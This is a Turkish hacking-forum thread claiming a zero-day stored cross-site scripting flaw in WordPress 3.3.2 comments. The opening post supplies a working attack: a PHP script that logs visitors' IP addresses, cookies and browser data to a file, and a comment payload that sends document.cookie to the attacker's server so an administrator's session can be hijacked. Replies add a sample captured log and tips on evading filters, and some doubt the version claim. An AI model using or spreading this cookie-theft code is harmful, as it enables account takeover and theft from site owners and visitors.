folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Wordpress 3.3.2 (Son Sürüm )0Day Cross Site Scripting Açığı !!!



Wordpress 3.3.2 (Son Sürüm )0Day Cross Site Scripting Açığı !!!

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek

    Arkadaşlar Wordpresin son sürümünde xss Açığı mevcut  yorum bölümüne eklenen javascript kodları çalışmakta
    örnek olarark şunun ekleyin deneyin

    <script>alert(Tahribat.com SeRDaR)</script> Çalıştığının göreceksiniz şimdi bu yolla cookie bilgisini alalım

    <?php
    $ip = $_SERVER['REMOTE_ADDR'];
    $cookie = $_GET['c'];
    $referer = $_SERVER['HTTP_REFERER'];
    $browser = $_SERVER['HTTP_USER_AGENT'];
    $redirect = $_GET['redirect'];
    $data = "IP: " . $ip . "\n"
    ."Cookie: " . $cookie . "\n"
    ."Referrer: " . $referer . "\n"
    ."Browser: " . $browser . "\n\n";
    $log = "log.txt";
    @chmod($log, 0777);
    $f = fopen($log, 'a');
    fwrite($f, $data);
    fclose($f);
    ?>



    Bu kodları  xxx.php olarark sunucunuza atın  attığınız dizine birde log.txt adında text belgesi atın chmod 777 yapın sonra ise yorum bölümüne

    <script>window.open("http://www.siteniz.com/dizin/xxx.php?c="+document.cookie)</script>

    şeklinde eklediğinizde  girenlerin cookieleri log.txt de loglanacaktır şanmsınıza adminin cookie loglanırnırsa cookie editörle giriş de yapabilirsiniz.yeterince açıklayıcı olmuştur umarım.


    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kvasir
    kvasir's avatar
    Kayıt Tarihi: 24/Ağustos/2005
    Erkek

    lan bi korkuyla girdim siteye güncelledim her bişeyi, sağol.

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    HoLyCat
    HoLyCat's avatar
    Kayıt Tarihi: 03/Ekim/2009
    Erkek
    IP: 94.54.189.***
    Cookie: 
    Referrer: 
    Browser: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0

    buda log.txt in icindeki .

    kendi sitemde kendi üstümde denedim.. Cookie gostermiyor?
     

    edit : calisiyor :) lakin firefox ie engelliyor yeni pencere acmasina izin vermiyor.


    🆃🅰🅷🆁🅸🅱🅰🆃.🅲🅾🅼
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Kız Babası
    kuytul
    kuytul's avatar
    Kayıt Tarihi: 08/Eylül/2005
    Erkek

    hacı son sürüm 3.3.2 

    ya başlık yanlış ya son sürüm açığı değil bu.


    instagram.com/yks.rehberlik >> YKS Rehberlik ve Eğitim Koçluğu için takipte kalın ;)
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek

    çok kurcaladım açıkçası uğraşacak vaktimde yok  vaktiniz varsa sizler birde Başka bir sniffer la deneyin olmadı direk kod değilde image üzerinden cookie çekmeyi deneyin  kriptolayıp deneyin vs vs  yolları çok


    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    iLLuMiNaTi
    iLLuMiNaTi's avatar
    Banlanmış Üye
    Kayıt Tarihi: 08/Mart/2007
    Erkek

    index ve hit kaybını göze alarak tek tıklama ile sildim wp yi lanet ettirdi ya..

  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    admin yetkisinden yapmayın user olarak deneyin filitreye takılır


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
Toplam Hit: 1920 Toplam Mesaj: 7